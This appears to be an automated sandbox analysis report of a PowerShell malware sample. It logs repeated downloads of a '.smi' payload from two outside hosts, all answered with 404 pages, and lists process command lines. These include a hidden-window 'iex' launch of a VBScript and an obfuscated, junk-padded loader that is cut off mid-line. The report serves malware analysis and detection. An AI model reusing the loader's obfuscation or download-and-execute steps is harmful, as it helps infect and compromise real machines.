                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:28 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.1149894148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:34 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:34 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:34 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:34 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:34 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.1149907184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:39 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:40 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:40 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.1149920148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:45 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:46 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:46 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:46 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:46 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.1149929184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:51 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:52 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:52 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.1149942148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:57 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:58 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:57 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:58 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:58 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.1149958184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:03 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:03 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:41:03 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:41:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.1149971148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:09 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:09 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:41:09 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:41:09 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:41:09 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.1149986184.171.244.231443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:15 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:15 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:41:15 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:41:15 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.1149994148.251.114.233443832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:21 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:21 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:41:21 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:41:21 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:41:21 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:1
                                                                            Start time:04:39:14
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1"
                                                                            Imagebase:0x7ff6eb350000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:04:39:15
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff68cce0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:04:39:17
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"
                                                                            Imagebase:0x7ff6eb350000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:04:39:30
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs"
                                                                            Imagebase:0x7ff71c180000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:04:39:31
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e 